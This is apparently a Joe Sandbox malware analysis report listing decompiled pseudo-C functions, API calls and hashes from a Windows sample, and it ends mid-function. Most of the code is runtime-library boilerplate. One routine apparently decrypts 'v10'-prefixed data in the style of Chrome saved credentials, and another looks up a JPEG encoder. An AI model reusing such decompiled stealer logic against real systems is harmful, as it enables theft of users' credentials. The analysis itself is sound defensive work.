                                                                                • __getptd.LIBCMT ref: 004271C8
                                                                                  • Part of subcall function 00427B66: __getptd_noexit.LIBCMT ref: 00427B69
                                                                                  • Part of subcall function 00427B66: __amsg_exit.LIBCMT ref: 00427B76
                                                                                • __amsg_exit.LIBCMT ref: 004271E8
                                                                                • __lock.LIBCMT ref: 004271F8
                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00427215
                                                                                • _free.LIBCMT ref: 00427228
                                                                                • InterlockedIncrement.KERNEL32(037B1658), ref: 00427240
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                • String ID:
                                                                                • API String ID: 3470314060-0
                                                                                • Opcode ID: 0041529890f103ef0990be2336a34faa1ed93f03871305a504579e391149f390
                                                                                • Instruction ID: f2ce1a9b575a2c54d66a9ed1b9a2258742c9b1a4d3e183e17d77a931b2947903
                                                                                • Opcode Fuzzy Hash: 0041529890f103ef0990be2336a34faa1ed93f03871305a504579e391149f390
                                                                                • Instruction Fuzzy Hash: FF018E35F09B3197DB20AB25B44575E7760AF04724F91405BF810A7390CB7CAA42CB9E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040F07D(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t39;
                                                                                				void* _t40;
                                                                                
                                                                                				_push(0);
                                                                                				E00421975(E00435B0A, __ebx, __edi, __esi);
                                                                                				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                                				 *(_t40 - 4) = 4;
                                                                                				E0041D866(_t39);
                                                                                				_t20 =  *(_t39 + 0x1c);
                                                                                				if( *(_t39 + 0x1c) != 0) {
                                                                                					E0041E008(_t20);
                                                                                				}
                                                                                				 *(_t39 + 0x1c) =  *(_t39 + 0x1c) & 0x00000000;
                                                                                				_t21 =  *(_t39 + 0x14);
                                                                                				if( *(_t39 + 0x14) != 0) {
                                                                                					E0041E008(_t21);
                                                                                				}
                                                                                				 *(_t39 + 0x14) =  *(_t39 + 0x14) & 0x00000000;
                                                                                				_t22 =  *(_t39 + 0xc);
                                                                                				if( *(_t39 + 0xc) != 0) {
                                                                                					E0041E008(_t22);
                                                                                				}
                                                                                				 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0x00000000;
                                                                                				_t23 =  *(_t39 + 4);
                                                                                				if( *(_t39 + 4) != 0) {
                                                                                					E0041E008(_t23);
                                                                                				}
                                                                                				 *(_t39 + 4) =  *(_t39 + 4) & 0x00000000;
                                                                                				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
                                                                                				return E00421A4D(E0041D5AA(_t39));
                                                                                			}






                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0040F084
                                                                                • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040F094
                                                                                  • Part of subcall function 0041D866: _setlocale.LIBCMT ref: 0041D878
                                                                                • _free.LIBCMT ref: 0040F0A2
                                                                                  • Part of subcall function 0041E008: HeapFree.KERNEL32(00000000,00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E01E
                                                                                  • Part of subcall function 0041E008: GetLastError.KERNEL32(00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E030
                                                                                • _free.LIBCMT ref: 0040F0B4
                                                                                • _free.LIBCMT ref: 0040F0C6
                                                                                • _free.LIBCMT ref: 0040F0D8
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _free$ErrorFreeH_prolog3HeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                                • String ID:
                                                                                • API String ID: 2259855018-0
                                                                                • Opcode ID: a6e686c28c1f0924890c43bf0ea34bdd27091362e41be1f6b6d7a6bb714d0708
                                                                                • Instruction ID: 8996a8b111a2b4f7b9aaad9418afdc69debe712e457b1387b9f5d4f02c748b5e
                                                                                • Opcode Fuzzy Hash: a6e686c28c1f0924890c43bf0ea34bdd27091362e41be1f6b6d7a6bb714d0708
                                                                                • Instruction Fuzzy Hash: 7901A271650B119BE730AF62C40A78BB3E8AF0076DF10842EE445D79C1CB7CE5488B68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 57%
                                                                                			E0040F94A(char* __ebx, intOrPtr __ecx, long __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t48;
                                                                                				intOrPtr _t58;
                                                                                				long _t60;
                                                                                				void* _t64;
                                                                                				char* _t68;
                                                                                				void* _t70;
                                                                                				intOrPtr _t74;
                                                                                				int _t84;
                                                                                				void* _t86;
                                                                                
                                                                                				_t81 = __edi;
                                                                                				_t68 = __ebx;
                                                                                				_push(0x74);
                                                                                				E004219DE(E00435FB4, __ebx, __edi, __esi);
                                                                                				_t48 =  *((intOrPtr*)(_t86 + 8));
                                                                                				 *(_t86 - 0x3c) =  *(_t86 - 0x3c) & 0x00000000;
                                                                                				 *((intOrPtr*)(_t86 - 0x34)) = __ecx;
                                                                                				_t70 = 3;
                                                                                				_t83 = __edx;
                                                                                				 *(_t86 - 0x30) = __edx;
                                                                                				 *((intOrPtr*)(_t86 - 0x38)) = _t48;
                                                                                				if(_t48 < _t70) {
                                                                                					L10:
                                                                                					E0040C606(_t68, E0040F8E3(_t48,  *(_t86 - 0x30), 0));
                                                                                				} else {
                                                                                					_t81 = 0x43ec3c;
                                                                                					asm("repe cmpsb");
                                                                                					if(0 != 0) {
                                                                                						goto L10;
                                                                                					} else {
                                                                                						if( *((intOrPtr*)(_t86 + 0xc)) == 0 ||  *((intOrPtr*)(_t86 - 0x34)) == 0) {
                                                                                							 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
                                                                                							 *((intOrPtr*)(_t68 + 0x10)) = 0;
                                                                                							 *_t68 = 0;
                                                                                							goto L8;
                                                                                						} else {
                                                                                							_t84 = 0x40;
                                                                                							E00427E30(_t86 - 0x80, 0, _t84);
                                                                                							_t74 =  *((intOrPtr*)(_t86 - 0x38));
                                                                                							_t58 =  *(_t86 - 0x30) + 3;
                                                                                							 *((intOrPtr*)(_t86 - 0x78)) = _t58;
                                                                                							 *((intOrPtr*)(_t86 - 0x68)) = _t74 + _t58 - 0x13;
                                                                                							_t60 = _t74 - 0x1f;
                                                                                							 *(_t86 - 0x80) = _t84;
                                                                                							 *((intOrPtr*)(_t86 - 0x7c)) = 1;
                                                                                							 *((intOrPtr*)(_t86 - 0x74)) = 0xc;
                                                                                							 *((intOrPtr*)(_t86 - 0x64)) = 0x10;
                                                                                							 *(_t86 - 0x30) = _t60;
                                                                                							_t81 = LocalAlloc(_t84, _t60);
                                                                                							_t83 = 0;
                                                                                							if(_t81 == 0) {
                                                                                								L7:
                                                                                								 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
                                                                                								 *((intOrPtr*)(_t68 + 0x10)) = _t83;
                                                                                								 *_t68 = 0;
                                                                                								L8:
                                                                                								E0040381A(_t68, "NULL");
                                                                                							} else {
                                                                                								_t64 =  *0x44a1e8( *((intOrPtr*)(_t86 - 0x34)),  *((intOrPtr*)(_t86 - 0x74)) +  *((intOrPtr*)(_t86 - 0x78)),  *(_t86 - 0x30), _t86 - 0x80, 0, 0, _t81,  *(_t86 - 0x30), _t86 - 0x30, 0);
                                                                                								_t95 = _t64;
                                                                                								if(_t64 < 0) {
                                                                                									goto L7;
                                                                                								} else {
                                                                                									 *(_t86 - 0x1c) =  *(_t86 - 0x1c) & 0x00000000;
                                                                                									_push(0xf);
                                                                                									 *((intOrPtr*)(_t86 - 0x18)) = 0;
                                                                                									 *((char*)(_t86 - 0x2c)) = 0;
                                                                                									E00403A16(_t86 - 0x2c, _t95, _t81,  *(_t86 - 0x30));
                                                                                									 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
                                                                                									 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0x00000000;
                                                                                									 *((intOrPtr*)(__ebx + 0x14)) = 0;
                                                                                									_t83 = _t86 - 0x2c;
                                                                                									_t81 = __ebx;
                                                                                									 *__ebx = 0;
                                                                                									E0040CFB8(__ebx, _t86 - 0x2c);
                                                                                									E00402C34(_t83, 1, 0);
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				return E00421A61(_t68, _t81, _t83);
                                                                                			}













                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0040F951
                                                                                • _memset.LIBCMT ref: 0040F99F
                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,00000074,00410302), ref: 0040F9DA
                                                                                  • Part of subcall function 0040CFB8: _memmove.LIBCMT ref: 0040CFD4
                                                                                  • Part of subcall function 00402C34: _memmove.LIBCMT ref: 00402C53
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: _memmove$AllocH_prolog3_Local_memset
                                                                                • String ID: NULL$v10
                                                                                • API String ID: 1135815740-1391045996
                                                                                • Opcode ID: c854a48d4a2ddd66d6261875e9f75586a41767216cbd5652a4605086923db5c9
                                                                                • Instruction ID: 2f77f4d33e17d87f15a9b46549870d400b93aa92c64146252089dcebf73b984f
                                                                                • Opcode Fuzzy Hash: c854a48d4a2ddd66d6261875e9f75586a41767216cbd5652a4605086923db5c9
                                                                                • Instruction Fuzzy Hash: 13416E71E01218ABDF24DFA5D885BAEBBB9AF44304F10407EF404AB282C7799904CF99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 94%
                                                                                			E0040E52C(signed int __ecx, intOrPtr* __edi, intOrPtr* _a4) {
                                                                                				signed int _v8;
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				signed int _t17;
                                                                                				signed int _t18;
                                                                                				intOrPtr _t23;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr* _t27;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr _t30;
                                                                                				intOrPtr* _t31;
                                                                                				signed int _t33;
                                                                                				signed int _t34;
                                                                                				signed int _t37;
                                                                                				intOrPtr* _t40;
                                                                                				intOrPtr* _t41;
                                                                                				signed int _t42;
                                                                                				intOrPtr* _t43;
                                                                                				intOrPtr* _t47;
                                                                                				void* _t51;
                                                                                
                                                                                				_t47 = __edi;
                                                                                				_t37 = __ecx;
                                                                                				_push(__ecx);
                                                                                				_t17 =  *(_a4 + 0x10);
                                                                                				_push(_t33);
                                                                                				_t34 = _t33 | 0xffffffff;
                                                                                				if(_t17 < 0xffffffff) {
                                                                                					_t34 = _t17;
                                                                                				}
                                                                                				_t18 =  *(_t47 + 0x10);
                                                                                				if((_t37 | 0xffffffff) - _t18 <= _t34) {
                                                                                					_t18 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t34 != 0) {
                                                                                					_v8 = _t18 + _t34;
                                                                                					if(E00403AFB(_t34, _t47, _t18 + _t34) != 0) {
                                                                                						_t23 =  *((intOrPtr*)(_t47 + 0x14));
                                                                                						_t51 = 8;
                                                                                						if(_t23 < _t51) {
                                                                                							_t40 = _t47;
                                                                                						} else {
                                                                                							_t40 =  *_t47;
                                                                                						}
                                                                                						if(_t23 < _t51) {
                                                                                							_t24 = _t47;
                                                                                						} else {
                                                                                							_t24 =  *_t47;
                                                                                						}
                                                                                						_t36 = _t34 + _t34;
                                                                                						E0041E250(_t24 + _t34 + _t34, _t40,  *(_t47 + 0x10) +  *(_t47 + 0x10));
                                                                                						_t27 = _a4;
                                                                                						if(_t47 != _t27) {
                                                                                							if( *((intOrPtr*)(_t27 + 0x14)) >= _t51) {
                                                                                								_t27 =  *_t27;
                                                                                							}
                                                                                							if( *((intOrPtr*)(_t47 + 0x14)) < _t51) {
                                                                                								_t41 = _t47;
                                                                                							} else {
                                                                                								_t41 =  *_t47;
                                                                                							}
                                                                                							E00421230(_t41, _t27, _t36);
                                                                                						} else {
                                                                                							_t30 =  *((intOrPtr*)(_t47 + 0x14));
                                                                                							if(_t30 < _t51) {
                                                                                								_t43 = _t47;
                                                                                							} else {
                                                                                								_t43 =  *_t47;
                                                                                							}
                                                                                							if(_t30 < _t51) {
                                                                                								_t31 = _t47;
                                                                                							} else {
                                                                                								_t31 =  *_t47;
                                                                                							}
                                                                                							E0041E250(_t31, _t43, _t36);
                                                                                						}
                                                                                						_t42 = _v8;
                                                                                						 *(_t47 + 0x10) = _t42;
                                                                                						if( *((intOrPtr*)(_t47 + 0x14)) < _t51) {
                                                                                							_t29 = _t47;
                                                                                						} else {
                                                                                							_t29 =  *_t47;
                                                                                						}
                                                                                						 *((short*)(_t29 + _t42 * 2)) = 0;
                                                                                					}
                                                                                				}
                                                                                				return _t47;
                                                                                			}

























                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                • String ID: string too long
                                                                                • API String ID: 1771113911-2556327735
                                                                                • Opcode ID: 0685a29103b4cb48a4660cdfa09c59c41d5c618c14e66b85499d29d6f1d45123
                                                                                • Instruction ID: b7c9fec09c3477a45f8a3c082959292035efc6c769f60ed409a7c864626798bb
                                                                                • Opcode Fuzzy Hash: 0685a29103b4cb48a4660cdfa09c59c41d5c618c14e66b85499d29d6f1d45123
                                                                                • Instruction Fuzzy Hash: 4B216470700211BFC714DF9ACD9196AB3A6AB917683140E3AF415E73C0E778DC61879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 24%
                                                                                			E00417BCB(void* __edi, void* _a4) {
                                                                                				signed int _v8;
                                                                                				void* _v12;
                                                                                				void* _v16;
                                                                                				void* __esi;
                                                                                				signed int _t21;
                                                                                				signed int _t22;
                                                                                				signed int _t23;
                                                                                				signed int _t27;
                                                                                				char* _t30;
                                                                                				void* _t32;
                                                                                				void* _t33;
                                                                                				intOrPtr _t34;
                                                                                				intOrPtr _t36;
                                                                                				signed int* _t40;
                                                                                
                                                                                				_t21 =  &_v16;
                                                                                				_v16 = 0;
                                                                                				_v12 = 0;
                                                                                				__imp__GdipGetImageEncodersSize(_t21,  &_v12);
                                                                                				if(_v12 != 0) {
                                                                                					_t22 = E0041E042(_t32, __edi, 0, _v12);
                                                                                					_t27 = _t22;
                                                                                					if(_t27 != 0) {
                                                                                						__imp__GdipGetImageEncoders(_v16, _v12, _t27, __edi);
                                                                                						_t36 = _v16;
                                                                                						_v8 = 0;
                                                                                						if(_t36 <= 0) {
                                                                                							L15:
                                                                                							_t23 = _t22 | 0xffffffff;
                                                                                							L16:
                                                                                							L17:
                                                                                							return _t23;
                                                                                						}
                                                                                						_t11 = _t27 + 0x30; // 0x30
                                                                                						_t40 = _t11;
                                                                                						do {
                                                                                							_t22 =  *_t40;
                                                                                							_t30 = L"image/jpeg";
                                                                                							while(1) {
                                                                                								_t33 =  *_t22;
                                                                                								if(_t33 !=  *_t30) {
                                                                                									break;
                                                                                								}
                                                                                								if(_t33 == 0) {
                                                                                									L11:
                                                                                									_t22 = 0;
                                                                                									L13:
                                                                                									if(_t22 == 0) {
                                                                                										asm("movsd");
                                                                                										asm("movsd");
                                                                                										asm("movsd");
                                                                                										asm("movsd");
                                                                                										E0041E008(_t27);
                                                                                										_t23 = _v8;
                                                                                										goto L16;
                                                                                									}
                                                                                									goto L14;
                                                                                								}
                                                                                								_t34 =  *((intOrPtr*)(_t22 + 2));
                                                                                								if(_t34 != _t30[2]) {
                                                                                									break;
                                                                                								}
                                                                                								_t22 = _t22 + 4;
                                                                                								_t30 =  &(_t30[4]);
                                                                                								if(_t34 != 0) {
                                                                                									continue;
                                                                                								}
                                                                                								goto L11;
                                                                                							}
                                                                                							asm("sbb eax, eax");
                                                                                							asm("sbb eax, 0xffffffff");
                                                                                							goto L13;
                                                                                							L14:
                                                                                							_v8 = _v8 + 1;
                                                                                							_t40 =  &(_t40[0x13]);
                                                                                						} while (_v8 < _t36);
                                                                                						goto L15;
                                                                                					}
                                                                                					_t23 = _t22 | 0xffffffff;
                                                                                					goto L17;
                                                                                				}
                                                                                				return _t21 | 0xffffffff;
                                                                                			}

                                                                                APIs
                                                                                • GdipGetImageEncodersSize.GDIPLUS(?,00417D1A,00000000,?,00417D1A,?,?,?,?,?,?,?,00417D99), ref: 00417BE2
                                                                                • _malloc.LIBCMT ref: 00417BF6
                                                                                • _free.LIBCMT ref: 00417C7B
                                                                                  • Part of subcall function 0041E008: HeapFree.KERNEL32(00000000,00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E01E
                                                                                  • Part of subcall function 0041E008: GetLastError.KERNEL32(00000000,?,00427B57,00000000,?,?,00423E60,0041E0CB,?,?,00402F66,00000010), ref: 0041E030
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: EncodersErrorFreeGdipHeapImageLastSize_free_malloc
                                                                                • String ID: image/jpeg
                                                                                • API String ID: 34177290-3785015651
                                                                                • Opcode ID: 93ef848b1ee1ea328e2a5295c08d0db9a415a871f46c76584b979af90b840b7a
                                                                                • Instruction ID: 319453ee1547e7f9947a87b58f72116eefa2af3bf3731a6e6d63df9ed313092e
                                                                                • Opcode Fuzzy Hash: 93ef848b1ee1ea328e2a5295c08d0db9a415a871f46c76584b979af90b840b7a
                                                                                • Instruction Fuzzy Hash: C7219272D08524ABCB119F64C9C44EEBB75FF25764B610297F821A7390E7369F81C6C8
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040D601(signed int __eax, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4) {
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				intOrPtr _t14;
                                                                                				intOrPtr _t17;
                                                                                				intOrPtr* _t18;
                                                                                				intOrPtr* _t21;
                                                                                				intOrPtr* _t23;
                                                                                				intOrPtr* _t24;
                                                                                				intOrPtr _t28;
                                                                                				signed int _t31;
                                                                                				intOrPtr* _t35;
                                                                                				void* _t36;
                                                                                				intOrPtr* _t37;
                                                                                				void* _t38;
                                                                                
                                                                                				_t38 = __ebp;
                                                                                				_t36 = __edi;
                                                                                				_t27 = _a4;
                                                                                				_t37 = __eax;
                                                                                				_t31 = __eax;
                                                                                				if(E00403D0E(__eax, _a4) == 0) {
                                                                                					_t14 =  *((intOrPtr*)(_t37 + 0x10));
                                                                                					if((_t31 | 0xffffffff) - _t14 <= __edi) {
                                                                                						_t14 = E0041D3B9("string too long");
                                                                                					}
                                                                                					if(_t36 != 0) {
                                                                                						_t28 = _t14 + _t36;
                                                                                						if(E00403CAC(_t28, _t37, _t36, _t38, _t28, 0) != 0) {
                                                                                							_t17 =  *((intOrPtr*)(_t37 + 0x14));
                                                                                							if(_t17 < 0x10) {
                                                                                								_t35 = _t37;
                                                                                							} else {
                                                                                								_t35 =  *_t37;
                                                                                							}
                                                                                							if(_t17 < 0x10) {
                                                                                								_t18 = _t37;
                                                                                							} else {
                                                                                								_t18 =  *_t37;
                                                                                							}
                                                                                							E0041E250(_t18 + _t36, _t35,  *((intOrPtr*)(_t37 + 0x10)));
                                                                                							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                								_t21 = _t37;
                                                                                							} else {
                                                                                								_t21 =  *_t37;
                                                                                							}
                                                                                							E00421230(_t21, _a4, _t36);
                                                                                							 *((intOrPtr*)(_t37 + 0x10)) = _t28;
                                                                                							if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                								_t23 = _t37;
                                                                                							} else {
                                                                                								_t23 =  *_t37;
                                                                                							}
                                                                                							 *((char*)(_t23 + _t28)) = 0;
                                                                                						}
                                                                                					}
                                                                                					return _t37;
                                                                                				}
                                                                                				if( *((intOrPtr*)(_t37 + 0x14)) < 0x10) {
                                                                                					_t24 = _t37;
                                                                                				} else {
                                                                                					_t24 =  *_t37;
                                                                                				}
                                                                                				return L0040D508(_t36, _t37, _t31, _t36, _t37, _t27 - _t24);
                                                                                			}

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: _memmove$Xinvalid_argumentstd::_
                                                                                • String ID: invalid string position$string too long
                                                                                • API String ID: 1771113911-4289949731
                                                                                • Opcode ID: fd0c51239c597e2d3d7871c880ba0d3e4328b44ca0266aa066e1e2eab5dda1f2
                                                                                • Instruction ID: eba0b8a39537324adec1d49bf4182e6b67c73c1e00a74bcbd8c27bc61cbd5b75
                                                                                • Opcode Fuzzy Hash: fd0c51239c597e2d3d7871c880ba0d3e4328b44ca0266aa066e1e2eab5dda1f2
                                                                                • Instruction Fuzzy Hash: B211D870B0071087DA349E9D8994926B7E5EF45704B100D3FF48AE72C2C73E9C88875E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041F811() {
                                                                                				intOrPtr _t5;
                                                                                				intOrPtr _t6;
                                                                                				intOrPtr _t10;
                                                                                				void* _t12;
                                                                                				intOrPtr _t15;
                                                                                				intOrPtr* _t16;
                                                                                				signed int _t19;
                                                                                				signed int _t20;
                                                                                				intOrPtr _t26;
                                                                                				intOrPtr _t27;
                                                                                
                                                                                				_t5 =  *0x44bdc0;
                                                                                				_t26 = 0x14;
                                                                                				if(_t5 != 0) {
                                                                                					if(_t5 < _t26) {
                                                                                						_t5 = _t26;
                                                                                						goto L4;
                                                                                					}
                                                                                				} else {
                                                                                					_t5 = 0x200;
                                                                                					L4:
                                                                                					 *0x44bdc0 = _t5;
                                                                                				}
                                                                                				_t6 = E0042303F(_t5, 4);
                                                                                				 *0x44ada0 = _t6;
                                                                                				if(_t6 != 0) {
                                                                                					L8:
                                                                                					_t19 = 0;
                                                                                					_t15 = 0x4471e0;
                                                                                					while(1) {
                                                                                						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                						_t15 = _t15 + 0x20;
                                                                                						_t19 = _t19 + 4;
                                                                                						if(_t15 >= 0x447460) {
                                                                                							break;
                                                                                						}
                                                                                						_t6 =  *0x44ada0; // 0x37b21b8
                                                                                					}
                                                                                					_t27 = 0xfffffffe;
                                                                                					_t20 = 0;
                                                                                					_t16 = 0x4471f0;
                                                                                					do {
                                                                                						_t10 =  *((intOrPtr*)(((_t20 & 0x0000001f) << 6) +  *((intOrPtr*)(0x44ac80 + (_t20 >> 5) * 4))));
                                                                                						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                							 *_t16 = _t27;
                                                                                						}
                                                                                						_t16 = _t16 + 0x20;
                                                                                						_t20 = _t20 + 1;
                                                                                					} while (_t16 < 0x447250);
                                                                                					return 0;
                                                                                				} else {
                                                                                					 *0x44bdc0 = _t26;
                                                                                					_t6 = E0042303F(_t26, 4);
                                                                                					 *0x44ada0 = _t6;
                                                                                					if(_t6 != 0) {
                                                                                						goto L8;
                                                                                					} else {
                                                                                						_t12 = 0x1a;
                                                                                						return _t12;
                                                                                					}
                                                                                				}
                                                                                			}













                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: __calloc_crt
                                                                                • String ID: PrD$`tD$qD
                                                                                • API String ID: 3494438863-3543007588
                                                                                • Opcode ID: 541aa3b2d9f4d34b47e56653a53e434ce1563b1c9d8ad749c41d622ce3df60f9
                                                                                • Instruction ID: 776341e7e09287abf72e6364a62878e3ea5ebf67c7de829c0b1cecaac84c5435
                                                                                • Opcode Fuzzy Hash: 541aa3b2d9f4d34b47e56653a53e434ce1563b1c9d8ad749c41d622ce3df60f9
                                                                                • Instruction Fuzzy Hash: 0911A371B446114BF7286F2EBC406A22391FB85774B64063BE505CA3A4EB3CD883828D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040E3F4(void* __eax, signed int __ecx, intOrPtr* __edi, intOrPtr* _a4, signed int _a8) {
                                                                                				void* __ebx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t23;
                                                                                				void* _t24;
                                                                                				signed int _t25;
                                                                                				intOrPtr* _t29;
                                                                                				intOrPtr* _t32;
                                                                                				void* _t33;
                                                                                				signed int _t34;
                                                                                				intOrPtr* _t37;
                                                                                				intOrPtr* _t43;
                                                                                				signed int _t45;
                                                                                
                                                                                				_t43 = __edi;
                                                                                				_t34 = __ecx;
                                                                                				_t33 = __eax;
                                                                                				_t23 =  *((intOrPtr*)(_a4 + 0x10));
                                                                                				if(_t23 < _a8) {
                                                                                					_t23 = E0041D406("invalid string position");
                                                                                				}
                                                                                				_t24 = _t23 - _a8;
                                                                                				if(_t24 < _t33) {
                                                                                					_t33 = _t24;
                                                                                				}
                                                                                				_t25 =  *(_t43 + 0x10);
                                                                                				if((_t34 | 0xffffffff) - _t25 <= _t33) {
                                                                                					_t25 = E0041D3B9("string too long");
                                                                                				}
                                                                                				if(_t33 != 0) {
                                                                                					_t45 = _t25 + _t33;
                                                                                					if(E00403AFB(_t33, _t43, _t45) != 0) {
                                                                                						_t37 = _a4;
                                                                                						if( *((intOrPtr*)(_t37 + 0x14)) >= 8) {
                                                                                							_t37 =  *_t37;
                                                                                						}
                                                                                						if( *((intOrPtr*)(_t43 + 0x14)) < 8) {
                                                                                							_t29 = _t43;
                                                                                						} else {
                                                                                							_t29 =  *_t43;
                                                                                						}
                                                                                						E00421230(_t29 +  *(_t43 + 0x10) * 2, _t37 + _a8 * 2, _t33 + _t33);
                                                                                						 *(_t43 + 0x10) = _t45;
                                                                                						if( *((intOrPtr*)(_t43 + 0x14)) < 8) {
                                                                                							_t32 = _t43;
                                                                                						} else {
                                                                                							_t32 =  *_t43;
                                                                                						}
